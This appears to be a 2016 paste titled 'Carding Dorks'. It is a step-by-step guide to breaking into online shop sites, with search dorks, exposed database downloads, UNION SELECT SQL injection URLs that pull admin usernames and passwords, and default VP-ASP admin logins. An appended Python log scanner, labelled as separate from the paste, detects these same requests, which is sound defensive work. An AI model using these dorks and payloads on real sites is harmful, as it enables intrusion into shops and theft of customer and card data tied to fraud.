an00sha

Carding Dorks

May 23rd, 2016
  1. [1]
  2. code:
  3. google.com:--> allinurl:/shop/category.asp/catid=
  4. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  5. exploit :--> /admin/dbsetup.asp
  6. target with exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  7. after getting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  8. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
  9. in db look for access to find pass and user of shop admins.
  10.  
  11. [2]
  12. code:
  13. google.com:--> allinurl:/commercesql/
  14. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  15. exploit :--> cgi-bin/commercesql/index.cgi?page=
  16. target with exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
  17. target with exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
  18. target with exploit order.log :--> http://www.xxxxx.com....iles/order.log
  19.  
  20. [3]
  21. code
  22. 1/search google: allinurl:"shopdisplayproducts.asp?id=
  23. --->http://victim.com/shopdisplayproducts.asp?id=5
  24.  
  25. 2/find error by adding '
  26. --->http://victim.com/shopdisplayproducts.asp?id=5'
  27.  
  28. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  29.  
  30. -If you don't see error then change id to cat
  31.  
  32. --->http://victim.com/shopdisplayproducts.asp?cat=5'
  33.  
  34. 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
  35.  
  36. --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
  37.  
  38. --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
  39.  
  40. 4/ add 2,3,4,5,6.......until you see a nice table
  41.  
  42. add 2
  43. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
  44. then 3
  45. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
  46. then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
  47.  
  48. ...5,6,7,8,9.... until you see a table. (exp:...47)
  49.  
  50. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
  51. ---->see a table.
  52.  
  53.  
  54. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  55.  
  56. --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
  57.  
  58. 6/Find link admin to login:
  59. try this first: http://victim.com/shopadmin.asp
  60. or: http://victim.com/shopadmin.asp
  61.  
  62.  
  63. Didn't work? then u have to find yourself:
  64.  
  65. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
  66.  
  67. --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
  68.  
  69.  
  70. you'll see something like: ( lot of them)
  71.  
  72. shopaddmoretocart.asp
  73. shopcheckout.asp
  74. shopdisplaycategories.asp
  75. ..............
  76.  
  77. then guess admin link by adding the above data until you find admin links
  78.  
  79. [4]
  80. Type: VP-ASP Shopping Cart
  81. Version: 5.00
  82. Dork = intitle:VP-ASP Shopping Cart 5.00
  83. You will find many websites with VP-ASP 5.00 cart software installed
  84. Now let's get to the exploit..
  85.  
  86. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
  87. The exploit is : diag_dbtest.asp
  88. so do this:
  89. ****://***.victim.com/shop/diag_dbtest.asp
  90.  
  91. A page will appear with something like:
  92.  
  93. xDatabase
  94. shopping140
  95.  
  96. xDblocation
  97. resx
  98.  
  99. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber.:. EXAMPLE .:.
  100. the most important thing here is xDatabase
  101. xDatabase: shopping140
  102. ok now the URL will be like this:
  103. ****://***.victim.com/shop/shopping140.mdb
  104. if you didn't download the Database..
  105. Try this while there is dblocation.
  106. xDblocation
  107. resx
  108.  
  109. the url will be:
  110. ****://***.victim.com/shop/resx/shopping140.mdb
  111. If u see the error message you have to try this :
  112. ****://***.victim.com/shop/shopping500.mdb
  113.  
  114. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  115.  
  116. inside you should be able to find *** information.
  117. and you should even be able to find the admin username and password for the website.
  118.  
  119. the admin login page is usually located here
  120. ****://***.victim.com/shop/shopadmin.asp
  121.  
  122. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  123.  
  124. Username: admin
  125. password: admin
  126. OR
  127. Username: vpasp
  128. password: vpasp
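
Added example, not part of the original paste: a log check a shop operator can run to find the request patterns listed above (setup and diagnostic pages, `.mdb` requests, quote and `union select` probes) in a web server access log. The rule names, the combined-log-format assumption and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Patterns taken from the requests the paste describes; matched against the
# URL-decoded, lower-cased request target. Rule names are this example's own.
RULES = [
    ("setup_or_diag_page", re.compile(r"/(diag_dbtest|dbsetup)\.asp\b")),
    ("database_file_request", re.compile(r"\.mdb(\?|$)")),
    ("commercesql_admin_or_log", re.compile(r"/(admin_conf\.pl|manager\.cgi|order\.log)(\?|$)")),
    ("sqli_union_probe", re.compile(r"\bunion\s+select\b")),
    ("sqli_sp_password_marker", re.compile(r"--\s*sp_password")),
    ("sqli_quote_probe", re.compile(r"[?&](id|cat)=\d+'")),
]
EXPOSURE_RULES = {"setup_or_diag_page", "database_file_request", "commercesql_admin_or_log"}

# Assumed common/combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(target):
    """Return the names of all rules the request target matches."""
    decoded = unquote_plus(target).lower()
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        rules = classify(m["target"]) if m else []
        if rules:
            status = int(m["status"])
            # A 200 on a setup page or database file means it was actually served.
            exposed = status == 200 and bool(EXPOSURE_RULES & set(rules))
            findings.append({"ip": m["ip"], "status": status, "rules": rules, "exposed": exposed})
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2016:10:00:00 +0000] "GET /shop/shopdisplayproducts.asp?id=5 HTTP/1.1" 200 8123',
    '198.51.100.7 - - [23/May/2016:10:00:05 +0000] "GET /shop/shopdisplayproducts.asp?id=5%27 HTTP/1.1" 500 1190',
    '198.51.100.7 - - [23/May/2016:10:00:09 +0000] "GET /shop/shopdisplayproducts.asp?id=5%27%20union%20select%201,2%20from%20tbluser%22having%201=1--sp_password HTTP/1.1" 500 1302',
    '198.51.100.7 - - [23/May/2016:10:01:00 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 200 2048',
    '198.51.100.7 - - [23/May/2016:10:01:20 +0000] "GET /shop/resx/shopping140.mdb HTTP/1.1" 200 4194304',
    '198.51.100.7 - - [23/May/2016:10:01:31 +0000] "GET /shop/shopping500.mdb HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `exposed` set means the server returned the setup page or database file itself; that file should be removed or moved out of the web root, and any credentials stored in it rotated.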